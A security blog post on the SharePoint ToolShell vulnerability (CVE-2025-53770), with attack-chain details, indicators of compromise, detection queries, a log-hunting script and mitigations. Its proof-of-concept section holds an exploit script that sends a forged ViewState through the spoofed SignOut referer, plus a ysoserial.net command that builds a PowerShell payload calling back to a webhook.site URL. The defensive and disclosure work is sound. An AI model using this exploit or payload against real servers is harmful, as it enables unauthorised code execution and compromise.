
CVE-2025-53770 – Microsoft SharePoint RCE

A zero‑day remote code execution vulnerability in Microsoft SharePoint (on‑premises).


Overview

In mid‑July 2025, Microsoft disclosed CVE-2025-53770, a zero‑day remote code execution vulnerability in on‑premises SharePoint. This flaw, when chained with CVE-2025-53771, enables unauthenticated attackers to fully compromise vulnerable servers over the internet.

The exploitation campaign, dubbed “ToolShell”, has been observed actively targeting governments, energy, education, and telecom sectors worldwide. If you run SharePoint Server (2016/2019/Subscription) and expose it to the internet, you need to patch now.

Impact at a glance

  • Attack Vector: Remote, unauthenticated
  • Impact: Full RCE (IIS worker context)
  • Exploitation: Active (confirmed by MS + CISA)
  • Ease: Exploitable with a single HTTP POST

Vulnerability Details

The issue lies in unsafe deserialization of crafted __VIEWSTATE data in the ToolPane.aspx component. When combined with a referer spoof (CVE-2025-53771), attackers can reach this endpoint without authentication, feed it a malicious payload, and gain remote code execution as the w3wp.exe (IIS worker) process.

The attack chain:

  1. Authentication bypass: Use Referer: /_layouts/SignOut.aspx to bypass security checks on /_layouts/15/ToolPane.aspx?DisplayMode=Edit.
  2. Malicious ViewState: Send a signed or forged ViewState payload containing serialized gadget chains (crafted via tools like ysoserial.net).
  3. RCE: SharePoint deserializes the payload and executes attacker‑controlled code.
  4. Persistence: Attackers drop a web shell (e.g., spinstall0.aspx) and steal machine keys for future signed payload generation.

Visualized:

[ Attacker ]
     |
     v
POST /_layouts/15/ToolPane.aspx
Referer: /_layouts/SignOut.aspx
     |
     v
[ SharePoint Server ]
Deserializes malicious __VIEWSTATE
     |
     v
[ RCE: Attacker code runs as w3wp.exe ]

Why It Matters

  • No authentication required: Works from the internet if the server is exposed.
  • Full takeover: Post‑exploitation, attackers can upload shells, pivot laterally, and persist even after patching by abusing stolen machine keys.
  • Exploited in the wild: Microsoft, CISA, and Rapid7 have confirmed active exploitation in multiple regions.

Affected Versions

  • SharePoint Server 2016 (before KB5002760)
  • SharePoint Server 2019 (before KB5002754)
  • SharePoint Subscription Edition (before KB5002768)

(SharePoint Online is not affected.)


Indicators of Compromise

  • Requests to /_layouts/15/ToolPane.aspx?DisplayMode=Edit with Referer: /_layouts/SignOut.aspx.
  • Dropped files: spinstall0.aspx, spinstall1.aspx
  • Suspicious process chains: w3wp.exe → cmd.exe → powershell.exe -EncodedCommand
  • Known attacker IPs: 107.191.58.76, 104.238.159.149, 96.9.125.147

Detection & Hunting

Splunk (IIS Logs)

index=iis sourcetype="ms:iis:auto" 
cs_uri_stem="/_layouts/15/ToolPane.aspx"
cs_referer="/_layouts/SignOut.aspx"
| stats count by clientip, cs_user_agent, _time

KQL (Microsoft Sentinel)

W3CIISLog
| where csUriStem == "/_layouts/15/ToolPane.aspx"
| where csReferer == "/_layouts/SignOut.aspx"
| summarize count() by cIP, csUserAgent, TimeGenerated
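The same hunt in plain Python, for teams without Splunk or Sentinel who only have exported IIS W3C log files. This is an added example written for this post, not code from the post's author or from Microsoft. It parses the #Fields header, flags the three indicators listed above (ToolPane.aspx reached with the SignOut referer, requests for the spinstall web shell names, and the published attacker IPs) and rolls the findings up by client IP like the Splunk query. The sample log, hostnames and internal IPs are constructed.

```python
"""ToolShell (CVE-2025-53770 / CVE-2025-53771) hunt over IIS W3C logs.

Added example for this post; not code from the post's author or from Microsoft.
Mirrors the Splunk/KQL queries above in plain Python so it runs offline against
exported IIS log files. The sample log below is constructed.
"""
from collections import Counter
from typing import Dict, Iterator, List

# Indicators taken from the post: the ToolPane endpoint, the spoofed referer,
# the dropped web shell names and the published attacker IPs.
TOOLPANE_STEM = "/_layouts/15/toolpane.aspx"
SIGNOUT_REFERER = "/_layouts/signout.aspx"
WEBSHELL_NAMES = {"spinstall0.aspx", "spinstall1.aspx"}
KNOWN_ATTACKER_IPS = {"107.191.58.76", "104.238.159.149", "96.9.125.147"}

# Constructed sample in IIS W3C extended format (hostnames and internal IPs are made up).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-19 10:00:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 DOMAIN\alice 10.0.0.20 Mozilla/5.0 https://sp.example.local/ 200 0 0 120
2025-07-19 10:00:07 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 - 107.191.58.76 python-requests/2.32 /_layouts/SignOut.aspx 200 0 0 850
2025-07-19 10:00:09 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 107.191.58.76 python-requests/2.32 - 200 0 0 30
2025-07-19 10:01:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 DOMAIN\bob 10.0.0.21 Mozilla/5.0 https://sp.example.local/_layouts/15/settings.aspx 200 0 0 400
"""


def parse_iis_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the names in the #Fields directive.

    IIS encodes spaces inside values as '+', so splitting on whitespace is safe.
    """
    fields: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Date, ...)
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # no header yet or malformed line: skip rather than guess
        yield dict(zip(fields, values))


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the ToolShell indicator names that match a single request."""
    hits: List[str] = []
    stem = entry.get("cs-uri-stem", "").lower()
    referer = entry.get("cs(Referer)", "-").lower()
    # Auth bypass (CVE-2025-53771): ToolPane.aspx reached with the SignOut referer.
    # endswith() accepts both a bare path and a full URL in the Referer field.
    if stem.endswith(TOOLPANE_STEM) and referer.endswith(SIGNOUT_REFERER):
        hits.append("toolpane_signout_referer")
    # Post-exploitation: a request for one of the dropped web shell file names.
    if stem.rsplit("/", 1)[-1] in WEBSHELL_NAMES:
        hits.append("webshell_request")
    if entry.get("c-ip") in KNOWN_ATTACKER_IPS:
        hits.append("known_attacker_ip")
    return hits


def hunt(text: str) -> List[Dict[str, object]]:
    """Run every log line through classify() and keep only the flagged ones."""
    findings: List[Dict[str, object]] = []
    for entry in parse_iis_w3c(text):
        indicators = classify(entry)
        if indicators:
            findings.append({
                "time": f"{entry.get('date', '-')} {entry.get('time', '-')}",
                "client": entry.get("c-ip", "-"),
                "uri": entry.get("cs-uri-stem", "-"),
                "referer": entry.get("cs(Referer)", "-"),
                "indicators": indicators,
            })
    return findings


def count_by_client(findings: List[Dict[str, object]]) -> Counter:
    """Same roll-up as the Splunk 'stats count by clientip' above."""
    return Counter(str(f["client"]) for f in findings)


if __name__ == "__main__":
    results = hunt(SAMPLE_LOG)
    for f in results:
        print(f"{f['time']} {f['client']} {f['uri']} referer={f['referer']} -> {', '.join(f['indicators'])}")
    print(dict(count_by_client(results)))
```

On the constructed sample, the legitimate authenticated ToolPane edit from an internal client (a normal referer from the same site) is not flagged, while the two requests from the known attacker IP are: the SignOut-referer POST and the follow-up request for spinstall0.aspx. To run it against real data, read the exported .log file into a string and pass it to hunt(); the hits on the SignOut referer and the web shell names are the high-confidence ones, the IP match alone is only a lead.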

Proof‑of‑Concept (Python)

A Python PoC is provided to test for CVE-2025-53770.

#!/usr/bin/env python3
# CVE-2025-53770 – SharePoint Unauthenticated RCE PoC
# Author: 0xH3G4Z1
# Usage: python3 exploit.py

import requests
import urllib3

urllib3.disable_warnings()

# === CONFIG ===
TARGET = "https://your-sharepoint-server"  # <--- CHANGE THIS
ENDPOINT = "/_layouts/15/ToolPane.aspx?DisplayMode=Edit"
FULL_URL = TARGET.rstrip("/") + ENDPOINT

VIEWSTATE_PAYLOAD = (
    "" # <--- CHANGE THIS
)

HEADERS = {
    "Referer": "/_layouts/SignOut.aspx",
    "Content-Type": "application/x-www-form-urlencoded"
}

DATA = {
    "__VIEWSTATE": VIEWSTATE_PAYLOAD,
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": ""
}

def exploit():
    print(f"[+] Sending payload to {FULL_URL}")
    try:
        r = requests.post(FULL_URL, headers=HEADERS, data=DATA, verify=False, timeout=10)
        print(f"[+] Response: {r.status_code} ({len(r.content)} bytes)")
        if r.status_code == 200:
            print("[+] If vulnerable, the payload was processed (check your target).")
        elif r.status_code == 403:
            print("[-] Access forbidden (patched or blocked).")
        else:
            print("[-] Exploit may not have succeeded.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    exploit()

Generating a payload:

To test whether the target processes ViewState and executes commands, you can generate a callback payload with ysoserial.net.
This example makes a PowerShell web request to a Webhook.site URL you control:

ysoserial.exe -p ObjectDataProvider -o base64 -g WindowsIdentity -c powershell -c "iwr 'https://webhook.site/3a5dbeec-f481-4515-b827-52c69a41b4d8'"
 > payload.txt

Then replace __VIEWSTATE with the contents of payload.txt.


Mitigation & Hardening

  1. Patch immediately: apply the KB updates listed under Affected Versions for your SharePoint version.
  2. Rotate machine keys (twice): Update the machineKey in web.config to invalidate stolen signing keys.
  3. Restrict access to /_layouts/15/ToolPane.aspx to internal networks only.
  4. Enable IIS request filtering to block oversized or suspicious ViewState payloads.
  5. Enable Defender AV + AMSI integration for real‑time scanning of SharePoint components.
  6. Hunt for compromise: Review IIS logs for ToolPane.aspx requests with unusual referers or large ViewState data.

Key Takeaways

  • CVE-2025-53770 is being actively exploited.
  • The attack is trivial once discovered (POST + spoofed Referer).
  • Patching alone is not enough — rotate machine keys to invalidate stolen ViewState signing keys.
  • Monitor for web shells (spinstall0.aspx, etc.) and suspicious ToolPane.aspx requests.


This post is licensed under CC BY 4.0 by the author.